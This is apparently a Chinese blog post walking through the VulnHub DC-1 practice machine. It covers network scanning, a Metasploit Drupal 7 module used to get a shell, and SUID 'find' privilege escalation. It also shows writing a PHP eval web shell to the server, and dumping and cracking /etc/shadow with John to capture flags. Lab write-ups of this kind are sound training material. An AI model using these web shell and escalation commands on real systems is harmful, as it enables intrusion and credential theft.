渗透测试全流程靶机vulnhubDC-1完成笔记

镜像下载地址

https://www.vulnhub.com/entry/dc-1-1,292/

信息收集

1、可以使用netdiscover -i eth0 发现二层网络信息

发现两个设备(103是真实机)。其中105为目标机器。
2、端口发现
Nmap -A 192.168.1.105

发现三个端口 22 80 111
80为http则直接浏览器访问
3、web指纹发现

发现Drupal 版本为 7

准备web渗透

因为7版本存在漏洞 而且在msf中也有
Drupal漏洞
在网上找了一圈没找到可getshell的exp,因为msf里面有集成cms的利用模块,所以使用msf进行getshell,用search命令搜索,发现7个漏洞模块,这里我随便选择了一个(use 2)

Show option 只需要填写RHOSTS

Set RHOSTS 192.168.1.105
Run

获取shell与与提权

因为仅仅是一个session 所以无法whoami 直接使用getuid

提权方法--查找具有root权限的命令进行提权

发现是 www-data用户。那么就需要提权
首先需要有session切换成shell
然后查找具有suid的文件,让这些文件来执行命令进行提权
Find / -perm -u=s -ype f 2>dev.null

发现find命令具有root权限,那就touch一个1 用find提权


使用find 1 -exec ‘/bin/sh’ \; 进入高权限shell

然后再写个一句话木马方便链接
find 1 -exec echo '<?php eval($_GET[a]);'>123.php \;
这里使用单引号包含需要写入的内容。放置$_GET被转义
重新写下find 1 -exec echo '<?php eval($_POST[a]);'>123.php \;

内网信息获取

1、百度查找该CMS配置,可以找到配置文件路径。发现如下信息

2、这个不用看,数据库肯定不能远程链接, 直接蚁剑链接数据库
登陆即可产看到flag3

3、密码获取
cat /etc/shadow

使用join爆破一下

find /etc/shadow -exec cat {} ;>all,txt 导入到当前txt中,用蚁剑下载下来

john --wordlist=/usr/share/john/password.lst --rules all.txt 使用johun爆破一下password.list为默认密码

登陆之后更目录下获取flag4

根据提示使用find flag4.txt -exec ‘/bin/sh’ ;切换到root权限

根据提示进入/root

发现最后的flag

posted @   李慢慢233  阅读(711)  评论(0编辑  收藏  举报
编辑推荐:
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 理解Rust引用及其生命周期标识(上)
阅读排行:
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
点击右上角即可分享
微信分享提示